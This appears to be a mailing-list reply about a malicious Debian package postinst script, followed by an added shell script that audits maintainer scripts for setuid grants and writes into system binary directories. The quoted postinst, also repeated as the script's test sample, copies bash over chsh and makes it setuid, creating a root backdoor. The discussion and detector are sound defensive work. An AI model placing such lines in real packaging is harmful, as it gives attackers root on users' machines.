
Re: First Linux Virus

Nicolás Lichtmaier wrote:
>$ cat postinst
>cp /bin/bash /usr/bin/chsh
>chmod u+s /usr/bin/chsh
>$ _
> The file exists as setuid in another package, but now it's a shell!!!
> The only way to check this is with file checksums...

What about my nightly cronjob:
  dpkg -i /debian/rex/binary/base/passwd_1.0-5.deb

But it's a serious problem.  I (and others) need to start verifying
that the debian diff is valid (by actually getting the upstream and
seeing if it applies correctly).  And reading the diff, before
installing to check for this sort of thing.  While we're at it, we can
check for bugs too :)

...  If only it were that easy :(

Christopher J. Fearnley            |    Linux/Internet Consulting
cjf@netaxs.com, cjf@onit.net       |    UNIX SIG Leader at PACS
http://www.netaxs.com/~cjf         |    (Philadelphia Area Computer Society)
ftp://ftp.netaxs.com/people/cjf    |    Design Science Revolutionary
"Dare to be Naive" -- Bucky Fuller |    Explorer in Universe
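
One way to automate a first pass of the review discussed in this thread, as an added example that is not part of the original message and not a dpkg feature: a shell function that lists maintainer-script lines granting setuid/setgid bits or writing into system binary directories. The function names, the regexes and the sample script (built from the quoted postinst) are assumptions made for this illustration.

```shell
#!/bin/sh
# Added example (not from the original thread): list maintainer-script lines
# that a reviewer should read before installing a package.

# flag LABEL REGEX FILE -> "LINENO:LABEL:TEXT" for each non-comment match
flag() {
    grep -nE "$2" "$3" | grep -vE '^[0-9]+:[[:space:]]*#' |
        sed "s/^\([0-9]*\):/\1:$1:/"
}

# audit_maintscript FILE -> all findings, ordered by line number
audit_maintscript() {
    cmd='(^|[;&|[:space:]])'   # start of line or a shell separator before the command
    {
        # chmod with a symbolic setuid/setgid bit: u+s, g+s, ug+s, +s, u=rws ...
        flag setid "${cmd}chmod[[:space:]](.*[[:space:],])?[ugoa]*[+=][rwxXst]*s[rwxXst]*([,[:space:]]|\$)" "$1"
        # chmod with a 4-digit octal mode whose first digit includes 4 (setuid) or 2 (setgid)
        flag setid "${cmd}chmod[[:space:]](.*[[:space:]])?[2-7][0-7]{3}([[:space:]]|\$)" "$1"
        # cp/mv/ln/install whose last argument lies in a system binary directory
        flag sysbin-write "${cmd}(cp|mv|ln|install)[[:space:]](.*[[:space:]])?/(usr/)?s?bin/[^[:space:]]+[[:space:]]*\$" "$1"
    } | sort -t: -k1,1n
}

# Constructed sample: the postinst quoted in the message, plus benign lines.
sample_postinst() {
    cat <<'EOF'
#!/bin/sh
set -e
# chmod u+s in a comment is ignored
cp /bin/bash /usr/bin/chsh
chmod u+s /usr/bin/chsh
chmod 0755 /usr/share/doc/passwd
EOF
}

tmp=$(mktemp)
sample_postinst > "$tmp"
audit_maintscript "$tmp"
rm -f "$tmp"
```

A clean result only means none of these patterns appeared; it narrows what to read first and does not replace reading the script or comparing installed files against known checksums.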
